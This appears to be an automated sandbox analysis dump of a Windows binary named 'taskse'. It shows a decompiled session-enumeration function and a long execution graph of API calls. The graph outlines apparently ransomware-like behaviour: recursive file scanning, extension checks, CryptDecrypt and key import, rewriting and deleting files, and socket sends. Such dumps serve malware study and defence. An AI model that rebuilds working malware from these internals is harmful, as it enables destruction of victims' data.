                                  control_flow_graph 70 401420-40143c LoadLibraryA 71 401449-40145b GetProcAddress 70->71 72 40143e-401448 70->72 73 401468-401478 GetProcAddress 71->73 74 40145d-401467 71->74 75 401485-4014a1 73->75 76 40147a-401484 73->76 78 4014a3-4014ad 75->78 79 4014ae-4014b6 75->79 80 4014f5-401507 79->80 81 4014b8-4014c2 79->81 82 4014c4-4014db call 401000 81->82 86 4014e1-4014ef Sleep 82->86 87 4014dd 82->87 86->82 88 4014f1 86->88 87->86 88->80
                                  C-Code - Quality: 64%
                                  			E00401420() {
                                  				signed int _v4;
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				signed int _t18;
                                  				signed int _t19;
                                  				signed int _t20;
                                  				signed int _t22;
                                  				void* _t27;
                                  				intOrPtr _t34;
                                  				signed int _t38;
                                  				void* _t39;
                                  				struct HINSTANCE__* _t40;
                                  				signed int _t41;
                                  				void* _t42;
                                  				void* _t45;
                                  
                                  				_t45 =  &_v16;
                                  				_v8 = 0;
                                  				_t18 = LoadLibraryA("Wtsapi32.dll"); // executed
                                  				_t40 = _t18;
                                  				if(_t40 != 0) {
                                  					_t19 = GetProcAddress(_t40, "WTSEnumerateSessionsA");
                                  					_t38 = _t19;
                                  					if(_t38 != 0) {
                                  						_t20 = GetProcAddress(_t40, "WTSFreeMemory");
                                  						_t41 = _t20;
                                  						_v4 = _t41;
                                  						if(_t41 != 0) {
                                  							_v16 = 0;
                                  							_v12 = 0;
                                  							_t22 =  *_t38(0, 0, 1,  &_v16,  &_v12); // executed
                                  							if(_v36 != 0) {
                                  								_t39 = 0;
                                  								if(_v32 > 0) {
                                  									_t34 = _v16;
                                  									_t42 = 0;
                                  									do {
                                  										_t27 = E00401000(_t34,  *((intOrPtr*)(_t42 + _v36)), 5, 0); // executed
                                  										_t45 = _t45 + 0x10;
                                  										if(_t27 == 0) {
                                  											_v28 = _v28 + 1;
                                  										}
                                  										Sleep(0x64); // executed
                                  										_t39 = _t39 + 1;
                                  										_t42 = _t42 + 0xc;
                                  									} while (_t39 < _v32);
                                  									_t41 = _v24;
                                  								}
                                  								 *_t41(_v36);
                                  								return _v32;
                                  							} else {
                                  								return _t22 | 0xffffffff;
                                  							}
                                  						} else {
                                  							return _t20 | 0xffffffff;
                                  						}
                                  					} else {
                                  						return _t19 | 0xffffffff;
                                  					}
                                  				} else {
                                  					return _t18 | 0xffffffff;
                                  				}
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNELBASE(Wtsapi32.dll,?,?,?,00000000,00401531,?,?,0000000A), ref: 00401432
                                  • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsA), ref: 00401455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: WTSEnumerateSessionsA$WTSFreeMemory$Wtsapi32.dll
                                  • API String ID: 2574300362-1631035820
                                  • Opcode ID: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                  • Instruction ID: 0fb0fd342c264c5c44d83e9ea296aa1d61a1bba0d9bf3c2d8dd8de9c1a89c2df
                                  • Opcode Fuzzy Hash: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                  • Instruction Fuzzy Hash: C9210E326043155BC210EF2DEC8096FB3D4EBC4771F910A3FFD64A72D0D639994546A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1584
                                  Total number of Limit Nodes:45
412990 4932->4992 4934 4129f8 4934->4907 4936 412a15 4935->4936 4937 412a09 4935->4937 4938 412a1a 4936->4938 4998 4127a0 4936->4998 4937->4912 4938->4912 4941 412a7d #825 4941->4912 4942 412a44 #825 4943 412a4d 4942->4943 4944 412a61 #825 4943->4944 4945 412a6a #825 4943->4945 4944->4945 4945->4941 4947 412815 4946->4947 4948 41287a 4946->4948 4947->4948 4949 41283d #823 4947->4949 4950 411c00 15 API calls 4948->4950 4949->4948 4951 41289d 4950->4951 4952 4128a6 4951->4952 4953 4128f8 #823 4951->4953 4954 4128e5 4952->4954 4955 4128b4 #825 4952->4955 4956 4128bd 4952->4956 4953->4925 4954->4925 4955->4956 4957 4128d6 #825 4956->4957 4958 4128cd #825 4956->4958 4957->4954 4958->4957 4960 412231 4959->4960 4961 411d11 4959->4961 4960->4931 4961->4960 4962 411ac0 free free 4961->4962 4965 411d27 4961->4965 4962->4965 4963 411d37 4963->4931 4964 411dc2 4967 411ddc 4964->4967 4968 4113e0 SetFilePointer SetFilePointer ReadFile 4964->4968 4965->4963 4965->4964 4966 411390 SetFilePointer SetFilePointer ReadFile 4965->4966 4966->4964 4969 411350 SetFilePointer SetFilePointer ReadFile 4967->4969 4968->4964 4970 411dfe 4969->4970 4971 411460 SetFilePointer SetFilePointer ReadFile 4970->4971 4972 411e15 4971->4972 4973 411e1c 4972->4973 4974 410a50 SetFilePointer SetFilePointer 4972->4974 4973->4931 4975 411e3e 4974->4975 4976 411e45 4975->4976 4977 411e56 #823 4975->4977 4976->4931 4978 410af0 ReadFile 4977->4978 4979 411e78 4978->4979 4980 411e83 #825 4979->4980 4981 411e9d _mbsstr 4979->4981 4980->4931 4983 411f15 _mbsstr 4981->4983 4983->4981 4984 411f2c _mbsstr 4983->4984 4984->4981 4985 411f43 _mbsstr 4984->4985 4985->4981 4986 411f5a 4985->4986 4987 411b80 SystemTimeToFileTime 4986->4987 4988 412063 LocalFileTimeToFileTime 4987->4988 4991 4120b6 4988->4991 4989 412203 4989->4931 4990 4121fa #825 4990->4989 4991->4989 4991->4990 4993 4129a3 4992->4993 4994 412998 4992->4994 4995 4129a8 4993->4995 4996 412360 28 API calls 4993->4996 4994->4934 4995->4934 4997 4129cf 
4996->4997 4997->4934 4999 4127b1 4998->4999 5000 4127a9 4998->5000 5002 4127c7 4999->5002 5003 410f70 CloseHandle #825 free free free 4999->5003 5001 411ac0 free free 5000->5001 5001->4999 5002->4941 5002->4942 5002->4943 5003->5002 5005 40d8ec 5004->5005 5006 40daad closesocket 5005->5006 5007 40baa8 5005->5007 5006->5007 5007->4804 5009 40c9f6 #823 5008->5009 5013 40ca40 5009->5013 5011 40ca81 5011->4860 5012 40ca87 #825 5012->5011 5013->5011 5013->5012 5015 40cbf3 5014->5015 5016 40cb00 5014->5016 5015->4866 5017 40cb26 5016->5017 5023 40cb90 5016->5023 5018 40cb31 5017->5018 5019 40cb2c ?_Xran@std@ 5017->5019 5033 40cd80 5018->5033 5019->5018 5020 40cbe9 5022 40cc60 5 API calls 5020->5022 5022->5015 5023->5020 5025 40cbaa 5023->5025 5024 40cb38 5027 40cb6a 5024->5027 5028 40cb47 memmove 5024->5028 5026 40c7b0 #825 5025->5026 5029 40cbb3 5026->5029 5031 40cd80 4 API calls 5027->5031 5050 40cc60 5028->5050 5029->4866 5032 40cb7d 5031->5032 5032->4866 5034 40cd93 5033->5034 5035 40ce27 5033->5035 5034->5035 5036 40cdd0 5034->5036 5037 40cdc9 ?_Xlen@std@ 5034->5037 5035->5024 5038 40cdf8 5036->5038 5041 40cde2 5036->5041 5037->5036 5039 40ce0a 5038->5039 5040 40cdfc 5038->5040 5039->5035 5046 40c7b0 #825 5039->5046 5042 40c7b0 #825 5040->5042 5043 40cde6 5041->5043 5044 40ce1f 5041->5044 5045 40ce05 5042->5045 5047 40c7b0 #825 5043->5047 5048 40c9c0 2 API calls 5044->5048 5045->5024 5046->5044 5049 40cdf3 5047->5049 5048->5035 5049->5024 5051 40cc73 5050->5051 5052 40cc6e ?_Xlen@std@ 5050->5052 5053 40cd04 5051->5053 5054 40cc88 5051->5054 5055 40ccae 5051->5055 5052->5051 5053->5054 5060 40cd08 5053->5060 5056 40cc90 5054->5056 5059 40c9c0 2 API calls 5054->5059 5058 40ccd9 #825 5055->5058 5062 40ccc4 5055->5062 5056->5027 5057 40cd4c 5063 40c9c0 2 API calls 5057->5063 5058->5062 5059->5056 5060->5056 5060->5057 5061 40cd43 #825 5060->5061 5064 40cd26 5060->5064 5061->5057 5062->5027 5065 40cd5d 5063->5065 5066 40c9c0 2 API calls 5064->5066 5065->5027 5067 40cd3b 
5066->5067 5067->5027 5068->4786 5069->4786 5071 412af5 5070->5071 5072 412ac8 free 5070->5072 5071->4794 5072->5071 5630 408c40 5631 408d5c 5630->5631 5633 408c97 5630->5633 5632 408c9d _ftol _ftol 5632->5633 5633->5631 5633->5632 6174 409a40 6178 409d40 6174->6178 6177 409ae7 #2414 #2414 6179 409a87 OffsetRect CreateRectRgn #1641 #5781 6178->6179 6179->6177 6374 409f40 PtVisible 6375 40cf40 6383 40d300 6375->6383 6377 40cf61 6378 40d300 6 API calls 6377->6378 6379 40cf66 6377->6379 6380 40cf87 6378->6380 6381 40d300 6 API calls 6380->6381 6382 40cf8c 6380->6382 6381->6382 6384 40d31f 6383->6384 6385 40d32e 6383->6385 6384->6377 6386 40d339 6385->6386 6387 40d373 time 6385->6387 6389 40d363 6385->6389 6390 40d378 6385->6390 6386->6377 6391 40d493 6387->6391 6392 40d41e 6387->6392 6405 40d2b0 6389->6405 6394 40d3b0 6390->6394 6395 40d380 6390->6395 6396 40d4b1 6391->6396 6401 40d4a8 free 6391->6401 6392->6391 6403 40d487 time 6392->6403 6404 40d469 Sleep 6392->6404 6409 412a90 malloc 6394->6409 6397 40d2b0 memmove 6395->6397 6396->6377 6397->6387 6399 40d3b6 6400 40d3c1 6399->6400 6402 40d2b0 memmove 6399->6402 6400->6377 6401->6396 6402->6387 6403->6391 6403->6392 6404->6392 6406 40d2f5 6405->6406 6407 40d2be 6405->6407 6406->6387 6408 40d2c3 memmove 6407->6408 6408->6406 6408->6408 6409->6399 6183 407650 6184 40765e 6183->6184 6187 407670 6183->6187 6185 4076a0 20 API calls 6184->6185 6188 407665 #2379 6185->6188 6186 407690 #2379 6187->6186 6189 40b620 9 API calls 6187->6189 6190 40768d 6189->6190 6190->6186 5634 404050 #616 5635 404068 5634->5635 5636 40405f #825 5634->5636 5636->5635 6068 404150 6073 404170 #2414 #800 #800 #795 6068->6073 6070 404158 6071 404168 6070->6071 6072 40415f #825 6070->6072 6072->6071 6073->6070 6180 403250 6181 403261 #825 6180->6181 6182 40326a 6180->6182 6181->6182 6191 413254 _exit 6074 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5487 405a60 5534 40b620 FindWindowW 5487->5534 5491 405aab #2514 5557 
403f20 #2414 5491->5557 5493 405ae9 5558 403f20 #2414 5493->5558 5495 405b04 5559 403f20 #2414 5495->5559 5497 405b1f 5560 403f20 #2414 5497->5560 5499 405b3f 5561 403f20 #2414 5499->5561 5501 405b5a 5562 403f20 #2414 5501->5562 5503 405b75 5563 403f20 #2414 5503->5563 5505 405b90 5564 403f20 #2414 5505->5564 5507 405bab 5565 403f20 #2414 5507->5565 5509 405bc6 5566 403f20 #2414 5509->5566 5511 405be1 5567 403f20 #2414 5511->5567 5513 405bfc 5568 403f90 #2414 5513->5568 5515 405c10 5569 403f90 #2414 5515->5569 5517 405c24 #800 #800 #800 #800 #781 5570 4050a0 #800 #795 5517->5570 5519 405c9c 5571 4050a0 #800 #795 5519->5571 5521 405cb0 5572 404170 #2414 #800 #800 #795 5521->5572 5523 405cc4 5573 404170 #2414 #800 #800 #795 5523->5573 5525 405cd8 5574 404170 #2414 #800 #800 #795 5525->5574 5527 405cec 5575 404170 #2414 #800 #800 #795 5527->5575 5529 405d00 5576 405d90 #654 #765 5529->5576 5531 405d14 5577 405d90 #654 #765 5531->5577 5533 405d28 #609 #609 #616 #641 5535 40b634 7 API calls 5534->5535 5536 405a8a #1134 #2621 #6438 5534->5536 5535->5536 5537 40b687 ExitProcess 5535->5537 5538 4060e0 #324 #567 #567 #567 5536->5538 5578 4085c0 7 API calls 5538->5578 5540 406162 5541 4085c0 9 API calls 5540->5541 5542 406172 5541->5542 5582 404090 7 API calls 5542->5582 5544 406182 5583 404090 7 API calls 5544->5583 5546 406192 5584 404090 7 API calls 5546->5584 5548 4061a2 5585 404090 7 API calls 5548->5585 5550 4061b2 5586 405000 #567 #540 5550->5586 5552 4061c2 5553 405000 2 API calls 5552->5553 5554 4061d2 #567 #540 #540 #540 #540 5553->5554 5588 407640 5554->5588 5556 4062cb 7 API calls 5556->5491 5557->5493 5558->5495 5559->5497 5560->5499 5561->5501 5562->5503 5563->5505 5564->5507 5565->5509 5566->5511 5567->5513 5568->5515 5569->5517 5570->5519 5571->5521 5572->5523 5573->5525 5574->5527 5575->5529 5576->5531 5577->5533 5579 408660 #6140 5578->5579 5580 408654 5578->5580 5579->5540 5580->5579 5581 40865a GetSysColor 5580->5581 5581->5579 5582->5544 5583->5546 
5584->5548 5585->5550 5587 40504a 5586->5587 5587->5552 5588->5556 5608 40db60 send 5609 401760 #6453 5610 401791 WaitForSingleObject TerminateThread CloseHandle 5609->5610 5611 4017b8 5609->5611 5610->5611 5612 40193e 5611->5612 5613 4018f6 5611->5613 5614 4017d8 sprintf fopen 5611->5614 5617 401915 5613->5617 5618 401903 rand 5613->5618 5615 401834 8 API calls 5614->5615 5616 4018da #1200 5614->5616 5615->5612 5616->5612 5617->5612 5619 401939 #1200 5617->5619 5618->5617 5619->5612 5637 403860 SendMessageA 5638 403892 SendMessageA 5637->5638 5639 403883 #1200 5637->5639 5640 4038d1 5638->5640 5641 4038a5 SendMessageA CreateThread 5638->5641 5641->5640 5642 4038e0 5641->5642 5645 4038f0 5642->5645 5644 4038e9 5664 403eb0 6 API calls 5645->5664 5647 403916 SendMessageA 5648 4039e1 5647->5648 5649 403937 SendMessageA 5647->5649 5711 403eb0 6 API calls 5648->5711 5650 403951 5649->5650 5651 403958 5649->5651 5665 403af0 fopen 5650->5665 5682 401e90 5651->5682 5654 4039ea CloseHandle 5654->5644 5656 403961 sprintf 5687 402020 5656->5687 5658 403998 5663 40399c 5658->5663 5696 403a20 5658->5696 5659 4039cd 5704 401f30 5659->5704 5662 4039c8 #1200 5662->5659 5663->5659 5663->5662 5664->5647 5666 403b41 5665->5666 5667 403b28 5665->5667 5668 401e90 InitializeCriticalSection 5666->5668 5667->5651 5669 403b4d 5668->5669 5670 402020 14 API calls 5669->5670 5671 403b67 5670->5671 5672 403b6b 5671->5672 5680 403b9b 5671->5680 5673 401f30 6 API calls 5672->5673 5675 403b82 5673->5675 5674 403c61 fclose 5676 401f30 6 API calls 5674->5676 5675->5651 5678 403c8f 5676->5678 5677 403bb2 fgets 5679 403c5f 5677->5679 5677->5680 5678->5651 5679->5674 5680->5674 5680->5677 5680->5679 5712 402650 MultiByteToWideChar 5680->5712 5804 404640 InitializeCriticalSection 5682->5804 5684 401eb6 5805 404640 InitializeCriticalSection 5684->5805 5686 401ec4 5686->5656 5806 4046f0 5687->5806 5689 402031 5690 402035 5689->5690 5691 402048 GlobalAlloc 5689->5691 5692 4046f0 12 API calls 5689->5692 
5690->5658 5693 402061 5691->5693 5694 402066 GlobalAlloc 5691->5694 5692->5691 5693->5658 5695 402079 5694->5695 5695->5658 5697 403a32 GetLogicalDrives 5696->5697 5698 403adc 5696->5698 5702 403a48 5697->5702 5698->5663 5699 403a53 GetDriveTypeW 5701 403a81 GetDiskFreeSpaceExW 5699->5701 5699->5702 5700 403ace 5700->5663 5701->5702 5702->5699 5702->5700 5823 4026b0 5702->5823 5913 401fa0 5704->5913 5706 401f60 5922 404690 DeleteCriticalSection 5706->5922 5708 401f7a 5923 404690 DeleteCriticalSection 5708->5923 5710 401f8a 5710->5648 5711->5654 5715 402560 wcscpy wcsrchr 5712->5715 5714 40269a 5714->5680 5716 4025c9 wcscat 5715->5716 5717 402599 _wcsicmp 5715->5717 5718 4025bd 5716->5718 5717->5718 5719 4025ae _wcsicmp 5717->5719 5728 4020a0 CreateFileW 5718->5728 5719->5716 5719->5718 5721 4025eb 5722 402629 DeleteFileW 5721->5722 5723 4025ef DeleteFileW 5721->5723 5724 402634 5722->5724 5723->5724 5725 4025fa 5723->5725 5724->5714 5726 402617 5725->5726 5727 4025fe MoveFileW 5725->5727 5726->5714 5727->5714 5729 402143 GetFileTime ReadFile 5728->5729 5740 402139 _local_unwind2 5728->5740 5731 40217c 5729->5731 5729->5740 5732 402196 ReadFile 5731->5732 5731->5740 5733 4021b3 5732->5733 5732->5740 5734 4021c3 ReadFile 5733->5734 5733->5740 5735 4021ea ReadFile 5734->5735 5734->5740 5736 402208 ReadFile 5735->5736 5735->5740 5737 402226 5736->5737 5736->5740 5738 402233 CloseHandle CreateFileW 5737->5738 5739 4022f9 CreateFileW 5737->5739 5738->5740 5742 402264 SetFilePointer ReadFile 5738->5742 5739->5740 5741 40232c 5739->5741 5740->5721 5761 404af0 5741->5761 5742->5740 5743 402297 5742->5743 5743->5740 5745 4022a4 SetFilePointer WriteFile 5743->5745 5745->5740 5747 4022ce 5745->5747 5746 40234d 5748 402372 5746->5748 5750 404af0 4 API calls 5746->5750 5747->5740 5749 4022db SetFilePointer SetEndOfFile 5747->5749 5748->5740 5766 40a150 5748->5766 5752 402497 SetFileTime 5749->5752 5750->5748 5753 4024e0 _local_unwind2 5752->5753 5754 4024bc CloseHandle 
MoveFileW 5752->5754 5753->5721 5754->5753 5755 402477 SetFilePointerEx SetEndOfFile 5755->5752 5757 4023e0 ReadFile 5757->5740 5758 4023a7 5757->5758 5758->5740 5758->5755 5758->5757 5773 40b3c0 5758->5773 5762 404b04 EnterCriticalSection CryptDecrypt 5761->5762 5763 404afc 5761->5763 5764 404b3b LeaveCriticalSection 5762->5764 5765 404b2d LeaveCriticalSection 5762->5765 5763->5746 5764->5746 5765->5746 5767 40a184 5766->5767 5768 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5766->5768 5769 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5767->5769 5770 40a1bd 5767->5770 5768->5767 5769->5770 5771 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5770->5771 5772 40a1f6 5770->5772 5771->5772 5772->5758 5774 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5773->5774 5775 40b3ee 5773->5775 5774->5775 5776 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5775->5776 5784 40b410 5775->5784 5777 40b5ba 5779 40b0c0 4 API calls 5777->5779 5785 402424 WriteFile 5777->5785 5779->5777 5781 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5783 40b4ed 5781->5783 5782 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5782->5777 5783->5777 5783->5782 5783->5785 5792 40adc0 5783->5792 5784->5781 5784->5783 5784->5784 5784->5785 5786 40b0c0 5784->5786 5785->5740 5785->5758 5787 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5786->5787 5788 40b0ee 5786->5788 5787->5788 5791 40b114 5788->5791 5798 40a9d0 5788->5798 5791->5784 5793 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5792->5793 5794 40adee 5792->5794 5793->5794 5795 40ae14 5794->5795 5801 40a610 5794->5801 5795->5783 5799 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5798->5799 5800 40a9ff 5798->5800 5799->5800 5800->5784 5802 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5801->5802 5803 40a63f 5801->5803 5802->5803 5803->5783 5804->5684 5805->5686 5807 4046b0 CryptAcquireContextA 5806->5807 5808 4046f8 5807->5808 5809 404709 5808->5809 5810 4046fc 5808->5810 5812 404711 CryptImportKey 5809->5812 
5813 40473e 5809->5813 5811 404770 3 API calls 5810->5811 5815 404703 5811->5815 5816 404760 5812->5816 5817 404731 5812->5817 5814 4049b0 7 API calls 5813->5814 5819 40474c 5814->5819 5815->5689 5816->5689 5818 404770 3 API calls 5817->5818 5820 404738 5818->5820 5819->5816 5821 404770 3 API calls 5819->5821 5820->5689 5822 40475a 5821->5822 5822->5689 5824 40c8f0 #823 5823->5824 5825 4026e4 5824->5825 5826 40c8f0 #823 5825->5826 5827 402706 swprintf FindFirstFileW 5826->5827 5828 40274d 5827->5828 5842 4027b4 5827->5842 5862 402e00 5828->5862 5830 40276a #825 5832 402e00 2 API calls 5830->5832 5831 4027d4 wcscmp 5834 40295d FindNextFileW 5831->5834 5835 4027ee wcscmp 5831->5835 5836 4027a0 #825 5832->5836 5833 402978 FindClose 5840 40298d 5833->5840 5844 4029b9 5833->5844 5834->5833 5834->5842 5835->5834 5837 402808 swprintf GetFileAttributesW 5835->5837 5839 402ace 5836->5839 5841 4028b6 wcscmp 5837->5841 5837->5842 5838 4029ef swprintf DeleteFileW swprintf DeleteFileW 5845 402a6a #825 5838->5845 5846 402a4f 5838->5846 5839->5702 5840->5844 5852 402560 59 API calls 5840->5852 5841->5834 5843 4028d0 wcscmp 5841->5843 5842->5831 5842->5833 5842->5834 5855 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5842->5855 5868 402af0 _wcsnicmp 5842->5868 5843->5834 5848 4028e6 wcscmp 5843->5848 5844->5838 5854 4026b0 84 API calls 5844->5854 5850 402a94 5845->5850 5851 402aba #825 5845->5851 5857 402a66 5846->5857 5894 402e90 5846->5894 5848->5834 5853 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5848->5853 5850->5851 5859 402e90 2 API calls 5850->5859 5851->5839 5852->5840 5856 402da0 8 API calls 5853->5856 5854->5844 5890 402da0 #823 5855->5890 5860 4028a3 
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5856->5860 5857->5845 5859->5850 5860->5834 5863 402e10 5862->5863 5864 402e7a 5862->5864 5865 402e4c #825 5863->5865 5866 402e40 #825 5863->5866 5864->5830 5865->5863 5867 402e6d 5865->5867 5866->5865 5867->5830 5869 402b12 wcsstr 5868->5869 5870 402b1f 5868->5870 5869->5870 5871 402b30 _wcsicmp 5870->5871 5872 402be9 _wcsicmp 5870->5872 5873 402b42 5871->5873 5874 402b4d _wcsicmp 5871->5874 5875 402c07 _wcsicmp 5872->5875 5876 402bfc 5872->5876 5873->5842 5879 402b67 _wcsicmp 5874->5879 5880 402b5c 5874->5880 5877 402c21 _wcsicmp 5875->5877 5878 402c16 5875->5878 5876->5842 5877->5842 5878->5842 5881 402b81 _wcsicmp 5879->5881 5882 402b76 5879->5882 5880->5842 5883 402b90 5881->5883 5884 402b9b _wcsicmp 5881->5884 5882->5842 5883->5842 5885 402bb5 wcsstr 5884->5885 5886 402baa 5884->5886 5887 402bc4 5885->5887 5888 402bcf wcsstr 5885->5888 5886->5842 5887->5842 5888->5872 5889 402bde 5888->5889 5889->5842 5891 402dbf 5890->5891 5899 402f10 5891->5899 5893 402de4 5893->5860 5895 402ed0 #825 5894->5895 5896 402eb1 5894->5896 5895->5846 5897 402ec4 #825 5896->5897 5898 402ebd 5896->5898 5897->5895 5898->5895 5900 402f40 5899->5900 5907 403044 5899->5907 5901 402f68 5900->5901 5906 402fdb 5900->5906 5903 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5901->5903 5904 402f6e ?_Xran@std@ 5901->5904 5902 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5902->5907 5908 402f85 5903->5908 5904->5903 5905 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5905->5893 5906->5902 5909 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5906->5909 5907->5893 5908->5905 5910 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5908->5910 5911 403006 5909->5911 5910->5905 5912 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 
5910->5912 5911->5893 5912->5905 5914 404770 3 API calls 5913->5914 5915 401fac 5914->5915 5916 404770 3 API calls 5915->5916 5917 401fb4 5916->5917 5917->5917 5919 401fe3 5917->5919 5920 401fd0 GlobalFree 5917->5920 5918 40200c 5918->5706 5919->5918 5921 401ff9 GlobalFree 5919->5921 5920->5919 5921->5918 5922->5708 5923->5710 6075 403560 6076 40358c #4376 6075->6076 6077 40356e GetExitCodeThread 6075->6077 6078 403593 6076->6078 6077->6076 6077->6078 6413 409f60 RectVisible 5924 404070 #693 5925 404088 5924->5925 5926 40407f #825 5924->5926 5926->5925 5927 40a070 DrawTextA 6080 408d70 6081 408e09 GetDeviceCaps 6080->6081 6083 408eb0 6081->6083 6089 408ed8 6081->6089 6084 408eba GetDeviceCaps GetDeviceCaps 6083->6084 6083->6089 6084->6089 6085 4090b6 #2414 6086 408f51 _ftol _ftol 6086->6089 6087 408fca _ftol _ftol _ftol 6088 409024 CreateSolidBrush #1641 6087->6088 6087->6089 6088->6089 6089->6085 6089->6086 6089->6087 6090 409048 FillRect #2414 6089->6090 6091 409083 #2754 6089->6091 6090->6089 6091->6089 6192 404670 6197 404690 DeleteCriticalSection 6192->6197 6194 404678 6195 404688 6194->6195 6196 40467f #825 6194->6196 6196->6195 6197->6194 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6198 403271 #2302 #2302 5083 401600 5084 4016e5 5083->5084 5085 40161a 5083->5085 5086 4016e9 #537 5084->5086 5096 4016de 5084->5096 5087 40161d 5085->5087 5088 40168f 5085->5088 5106 401970 #3092 #6199 #800 5086->5106 5090 401743 #2385 5087->5090 5093 401628 #537 5087->5093 5094 40165e 5087->5094 5091 401693 #537 5088->5091 5088->5096 5105 401970 #3092 #6199 #800 5091->5105 5092 401701 SendMessageA #2385 5103 401970 #3092 #6199 #800 5093->5103 5094->5096 5098 401663 #537 5094->5098 5096->5090 5104 401970 #3092 #6199 #800 5098->5104 5099 4016ab SendMessageA #2385 5100 401640 #2385 
5102 40167b #2385 5103->5100 5104->5102 5105->5099 5106->5092 6199 406a00 #4476 6200 406a23 6199->6200 6204 406a62 6199->6204 6201 406a38 #3089 6200->6201 6200->6204 6202 406a46 #3089 6201->6202 6201->6204 6203 406a54 #3089 6202->6203 6202->6204 6203->6204 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 5108 413102 __set_app_type __p__fmode __p__commode 5109 413171 5108->5109 5110 413185 5109->5110 5111 413179 __setusermatherr 5109->5111 5120 4133b2 _controlfp 5110->5120 5111->5110 5113 41318a _initterm __getmainargs _initterm 5114 4131de GetStartupInfoA 5113->5114 5116 413212 GetModuleHandleA 5114->5116 5121 4133e6 #1576 5116->5121 5119 413236 exit _XcptFilter 5120->5113 5121->5119 5928 403810 WideCharToMultiByte 5931 403e60 SendMessageA #3998 SendMessageA 5928->5931 5930 403845 5931->5930 5932 403410 #4476 5933 403454 #3089 5932->5933 5934 403431 5932->5934 5935 40343b 5933->5935 5934->5933 5934->5935 5936 404410 SetCursor 6092 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6211 40ca19 6212 40ca26 6211->6212 6213 40ca28 #823 6211->6213 6212->6213 6224 409a20 6229 4099c0 6224->6229 6227 409a38 6228 409a2f #825 6228->6227 6230 409a03 6229->6230 6231 4099f3 #6170 6229->6231 6230->6227 6230->6228 6231->6230 5937 40a020 TabbedTextOutA 5938 409c20 #3797 5939 409c40 #6734 5938->5939 5940 409c36 5938->5940 5941 409c5b SendMessageA 5939->5941 5942 409c78 5939->5942 5941->5942 5943 409ce4 5942->5943 5944 409caa 5942->5944 5945 409ce8 InvalidateRect 5943->5945 5948 409cf6 5943->5948 5946 409cd4 #4284 5944->5946 5947 409cc4 #4284 5944->5947 5945->5948 5946->5948 5947->5948 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 
